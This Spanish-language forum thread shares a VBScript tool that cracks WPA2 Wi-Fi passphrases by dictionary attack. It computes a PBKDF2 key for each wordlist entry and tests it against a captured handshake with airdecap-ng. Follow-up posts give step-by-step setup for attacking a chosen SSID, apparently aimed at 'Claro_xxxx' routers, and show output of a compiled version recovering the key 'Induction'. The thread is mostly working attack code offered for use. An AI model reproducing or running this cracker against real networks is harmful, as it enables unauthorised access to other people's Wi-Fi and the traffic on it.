Hola mis queridos colegas !!
Bueno, tenia mucho tiempo que no andaba por aqui, pero bueno, en los ultimos dias he estado programando un pequeño script en vbs el cual me ha dado buenos resultados es rapido y no consume CPU, ni memoria como el ya conocido aircrack, se me ocurrio hacelo de esta manera ( cosas de locos, ya saben )
aqui les dejo el codigo si alguien puede perfeccionarlo pues mucho mejor,(http://[img][img][img][ftp][/ftp%5D)[/img][/img][/img] requisitos :
airdecap-ng (librerias)
ChilkatAx-9.5.0-win32.zip ( http://www.chilkatsoft.com/download/9.5.0.49/ChilkatAx-9.5.0-win32.zip )
diccionario y dale pedale.....
Dim fso, outFile, variable, pw, tama
' abre el diccionario
acum = 0
const ForReading = 1
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile _
("f:\wpa2\clarohauwai-3.txt", ForReading)
start_time = time()
' empieza a recorrer el diccionario
Do Until objTextFile.AtEndOfStream
strNextLine = objTextFile.Readline
arrServiceList = Split(strNextLine)
Set crypt = CreateObject("Chilkat_9_5_0.Crypt2")
success = crypt.UnlockComponent("pepe")
If (success <> 1) Then
outFile.WriteLine(crypt.LastErrorText)
WScript.Quit
End If
' pasada del diccionario WPA passphrase
pw = arrServiceList(0) 'Induction
pwCharset = "ansi"
acum = acum + 1
' Hash algoritmo: sha1, md2, md5, etc.
hashAlg = "sha1"
' ssid y lo convierte a hex
strString = "Claro_xxxx" 'Coherer
strHex =""
For i=1 To Len(strString)
strHex = strHex + Hex(Asc(Mid(strString,i,1)))
Next
' asigna la variable a ssidHex
ssidHex = strHex
' la WPA key calcula 4096 interaciones.
iterationCount = 4096
outputBitLen = 256
enc = "hex"
start_time2 = time()
' reliza el calculo del hash
wpaHexKey = crypt.Pbkdf2(pw,pwCharset,hashAlg,ssidHex,iterationCount,outputBitLen,enc)
' llama el airdecap y le envia el hash calculado
Set WshShell = CreateObject("WScript.Shell")
Return = WshShell.Run("f:\wpa2\airdecap-ng.exe -l -k " & wpaHexKey & " -e " & strString & " F:\WPA2\rules\Claro_xxxx.cap",0, True)
' imprime variables
WScript.echo "SSID :", strString , " | Cantidad:",acum
WScript.Echo "------------------------------------------------------------------------------"
WScript.echo "CLAVE :", pw
WScript.Echo "------------------------------------------------------------------------------"
WScript.echo "WPA PMK :", wpaHexKey
WScript.Echo "------------------------------------------------------------------------------"
' determina el size del archivo que genera el airdecap
filename = ("F:\WPA2\rules\Claro_xxxx-dec.cap")
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(filename)
tama = f.Size
' si el archivo -dec.cap es alterado, ocea cuando se le envia el hash entonces....blablabla
If tama > 24 Then
WScript.Echo " "
WScript.Echo "========================================"
WScript.Echo " "
WScript.Echo "Clave desifrada 100% :", pw
WScript.Echo " "
WScript.Echo "========================================"
Exit do
End If
Loop
'airdecap-ng -k A288FCF0CAAACDA9A9F58633FF35E8992A01D9C10BA5E02EFDF8CB5D730CE7BC -e Coherer wpa-Induction.pcap | find "decrypted WPA"
Suerte !!!!
Mod: Los códigos deben ir en GeSHi
Gracias por el aporte Heolo, pero esto como se ejecuta en Wifislax por ejemplo se supone que este programa es para descifrar claves Wpa metiendo antes el handshake ? o haces un diccionario y craquear ? No me ha quedado muy claro, perdona.
ahhh, no fijate es un vbscript bajo DOS, es algo simple, como puedes ver aun no esta terminado pero funciona, solo debes colocar la ruta del diccionario, poner el nombre del ssid y el nombre del archivo que genera el airdecap-ng y el nombre del handshake es algo simple....
Citarahhh,, no fijate es un vbscript bajo DOS, es algo simple, como puedes ver aun no esta terminado pero funciona, solo debes colocar la ruta del diccionario, poner el nombre del ssid y el nombre del archivo que genera el airdecap-ng es algo simple....
Han vale que no lo has terminado pero puede funcionar bien para crackear lo he probado en Windows7 pero me salta un mensaje de error no se algo habré hecho mal después he leído el reamed pero esta todo en ingles y al verdad que yo de ingles estoy cortito, puede hacer un vídeo o poner en imagines los pasos a seguir para hacerlo bien si no te importa. Muchas gracias.
Te comento que aun no esta terminado pues falta ponerlo para pasarles arugumentos, como el nombre de diccionario, el archivo cap el nomebre del ssid.
como comente al principio, debes tener en el archivo airedecap-ng.exe y sus respectivas dll, como por igual la dll del programa ChilkatAx-9.5.0-win32.zip del cual puse el link todos estos conjunto con el diccionario deben estar en una misma carpeta :
( Aqui pones la ruta del diccionario o mejor si esta en la misma carpeta :)
----------------------------------------------------
' abre el diccionario
acum = 0
const ForReading = 1
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile _("f:\wpa2\clarohauwai-3.txt", ForReading)
start_time = time()
------------------------------------------------------------------
( Aqui colocas en la variable strString el ssid a atacar )
' ssid y lo convierte a hex
strString = "Claro_xxxx" 'Coherer
strHex =""
For i=1 To Len(strString)
strHex = strHex + Hex(Asc(Mid(strString,i,1)))
Next
-------------------------------------------------------------------
( Aqui colocas el nombre del handshake el mio aqui es Claro_xxx.cap )
' llama el airdecap y le envia el hash calculado
Set WshShell = CreateObject("WScript.Shell")
Return = WshShell.Run("f:\wpa2\airdecap-ng.exe -l -k " & wpaHexKey & " -e " & strString & " F:\WPA2\rules\Claro_xxx.cap",0, True)
--------------------------------------------------------------------------------------
( y por ultimo el nombre de archivo que genera el airdecap-ng al pasarle el hash que hemos calculado, el mio aqui es : Claro_xxxx-dec.cap)
---------------------------------------------------------------------------------------
' determina el size del archivo que genera el airdecap
filename = ("F:\WPA2\rules\Claro_xxxx-dec.cap")
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(filename)
tama = f.Size
Esto es todo, debe funcionar,
Saludos !!!!
Me sigue saltando un erro no se por que lo que hago mal te comento el mensaje que me salga dice lo siguiente: Error: El componente Activex no puede crear el objeto: Chikat_9_5_0.Crypt2.
Origen: Error de Microft VBScript en tiempo de ejecución. No se como ejecutarlo en windows7 me salta esos errores que te digo.
Entones me tengo que descargar el archivo airedecap-ng.exe y sus respectivas dlll donde me puede descargar eso para que me funcione todo es que no lo veo dentro de la carpeta que pusiste los siento soy muy torpe.
Es simple, en la carpeta Chikat_9_5_0.Crypt2. exite un archivo (register_win32.bat), permite que actives la dll, ejecutalo si es 32 o 64 dependiento recuerda que deben estar las dll en la caperta., ahh el archivo airedecap-ng esta en aircrack para windows
descargalo y alli viene...
Suerte
CitarEs simple, en la carpeta Chikat_9_5_0.Crypt2. exite un archivo (register_win32.bat), permite que actives la dll, ejecutalo si es 32 o 64 dependiento recuerda que deben estar las dll en la caperta., ahh el archivo airedecap-ng esta en aircrack para windows
descargalo y alli viene...
Mi portátil es de 32 bit osea me viene bien bueno probare como me dices a ver si tengo suerte y ya te comentare. Gracias
Hola !!!
Por aqui les envio una prueba realzada, al termino para los que esten interesados le pondre un link para la descarga : Saludos
F:\WPA2>Hashpmk-dh
Hashpmk-dh 1.0 -(C) 2015-2016 by Heolo
use: hashpmk-dh <ssid> <diccionario> <handshake>
Opciones :
ssid : nombre del identificador wifi
diccionario : nombre del diccionario
handshake : archivo handshake (cap, pcap..etc)
F:\WPA2>Hashpmk-dh Coherer clarohauwai-1.txt wpa-Induction.pcap
Probando : 1 : SBUGHWAP1O50M : 5CF1CA924A101D096F94ACC8F76B116F1A58A04F1640FBAAEF613B2719A1FE0E
Probando : 2 : T6QDMARP30ZLI : 3DEA1D4F48BB61CB333EAAEA08E5513E8FFF5B171346813E1FB9F563B436C30F
Probando : 3 : 8EQD0UFIKJZMW : 61EEA069DF2E6278981CB376F6B488C0E4B0CBA2E579CD4AE4763DBD6842B6F3
Probando : 4 : A2LNWCVFUEK09 : F826BC49F875BD239D50DEFC3644050188F022E4E0195F5B3058AAA86B7F3B45
Probando : 5 : O6V7WP3DMS49H : 8357E06064FB338858ACA04AD38CB5BEB84215D4EB892FD3CF640031AE427C16
Probando : 6 : CBTR632OP7A48 : 02AC460A59980BA10E29BA343EF1D1A4F7B6126073CC7F2727961118FFF1D7D3
Probando : 7 : DNOR58SMEQZT7 : D6057C7C874D9DFB3135E0FFD855AD89EC2FDF63A24790E82948F42021ED26AB
Probando : 8 : 801AB5QCLDUKE : E0663F7AA9A26792FF6D10E3DB690FD179727A04285380D8CC24CBBFB8EE7A17
Probando : 9 : TFQ9H4OEVKML5 : D4BDF6FB1BF4FFD6F181BEE2B59C7EA48FBC259585C58B8F694F6159AF484464
Probando : 10 : V8JG7NSYEM23T : DB6DDFFF837F832D45A2BEEBF8E5BD27DD97BE7E3DEF794E2581DC13F65B5087
Probando : 11 : NUZHI1EP3A5YV : 65565E8DCAD7AC4B25AD0F38E9BD69E1E59BCD38424AEFA5E76F018A68CE2417
Probando : 12 : FY2OE9IJ3T5S8 : 8B3793E8C6D1161F9D0AB5341C797F45A53EDC6FD9DE45415AD8F85E73A5BAF8
Probando : 13 : WD34OMB7E2VC8 : 8692071F8352BF635FB102B163C55DE6F2331BA2587CD1D68312F074813A1D5C
Probando : 14 : P8GWHERV7QM1S : F3A42C93D21FF2AA1BCE21CE50DA133D30E4C19AEC1F709ED8C02811965E66E2
Probando : 15 : VCJZWR8ITBP7Q : 04562BE35439729812A8944F662D18E6AF713ECDD0B0CB7C478A245AE6694891
Probando : 16 : TJF49BK2MO506 : 5C331FB35AA8730673E46DC91C5A007B80C60EAA43D43941E6E182255248BF78
Probando : 17 : VIY3A6PJ02GB7 : B7EFF16FED66A72CA75BE07B7A6B267FE206EB2451CBA33AA0A67B7BD7B84E37
Probando : 18 : 4609WB2YVM8LI : AAA1CAFB697A930F762B7244EA6A731B8DEE7435CA0FC8EA1AF0929831352A9F
Probando : 19 : V3EDHL1KJRCAQ : 9CD0C1255E4D43802A71A26B62391CA26F03C881BD3437F8C97C839CE349ABA6
Probando : 20 : 35IKWYEC906OB : 1D697F3CB4FAE9C053CF31F83448BA140D06664A406F7800A7FD8815FA8766ED
Probando : 21 : 689KSL7JD0RVU : 7A0AFBE227A50557F32830792B2AF0E5A055DBDA803C72C68C82EC8484B21887
Probando : 22 : YNKSA9UH8J7OI : E1382F001D7ABB0855262F6385250142A4D98841A5045DC87FCFC21C69D787CB
Probando : 23 : MZNG4PTIV8HRE : 72736C07F0210A03486E5647BAA43221CC5994516C387F4D95EF07D24516C994
Probando : 24 : 6F0P75AJWQRIM : 37B769A43073AF46990EE61D7AE59DDAA5ED1DAAF270D8B6A666A8BC64409676
Probando : 25 : 0WU4Y6KPVMI1C : 9F9675D1C3B75470F6848567E59808192CAE220D0CB57C58837FD8780D2EBF93
Probando : 26 : Induction : A288FCF0CAAACDA9A9F58633FF35E8992A01D9C10BA5E02EFDF8CB5D730CE7BC
-------------------------------
Ssid :Coherer
Clave desifrada 100% :Induction
-------------------------------